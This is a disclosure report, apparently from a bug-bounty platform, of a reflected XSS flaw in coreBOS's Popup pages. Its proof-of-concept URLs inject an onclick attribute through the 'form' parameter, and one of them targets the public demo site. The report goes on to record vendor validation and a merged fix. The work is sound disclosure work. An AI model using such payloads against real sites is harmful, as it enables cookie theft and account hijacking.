Reflected XSS on the Products Modules in tsolucio/corebos

Valid

Reported on

Jun 25th 2022


Description

coreBOS is vulnerable with Reflected XSS on the Products modules. The HTML tag can be escaped with " character and the attacker can be able to perform the Reflected XSS

Proof of Concept

  1. Login to coreBOS
  2. Go to
http://localhost:8888/corebos/index.php?module=Products&action=Popup&html=Popup_picker&form=rel=%22canonical%22+accesskey=%22X%22+onclick=%22alert(1)%22xxx&forfield=product_id&srcmodule=Campaigns&forrecord=

Or:

http://localhost:8888/corebos/index.php?module=Accounts&action=Popup&popuptype=specific_account_address&form=rel=%22canonical%22+accesskey=%22X%22+onclick=%22alert(1)%22xxx&form_submit=false&fromlink=
  1. (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Impact

The impact of this vulnerability is the attacker can be able to execute the javascript script on the webapps and can be able to steal cookie as an example.

We are processing your report and will contact the tsolucio/corebos team within 24 hours. 3 months ago
Nosa Shandy
3 months ago

Researcher


Hi Team,

To easily reproduce the issue you can go to:

https://demo.corebos.com/index.php?module=Products&action=Popup&html=Popup_picker&form=rel=%22canonical%22+accesskey=%22X%22+onclick=%22alert(document.domain)%22xxx&forfield=product_id&srcmodule=Campaigns&forrecord=

and then (Press ALT+SHIFT+X on Windows) or (CTRL+ALT+X on OS X)

Thanks, @apapedulimu

Nosa Shandy modified the report
3 months ago
We have contacted a member of the tsolucio/corebos team and are waiting to hear back 3 months ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. 3 months ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. 3 months ago
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. 2 months ago
Joe Bordes validated this vulnerability a month ago
Nosa Shandy has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Joe Bordes confirmed that a fix has been merged on 210380 a month ago
Joe Bordes has been awarded the fix bounty
to join this conversation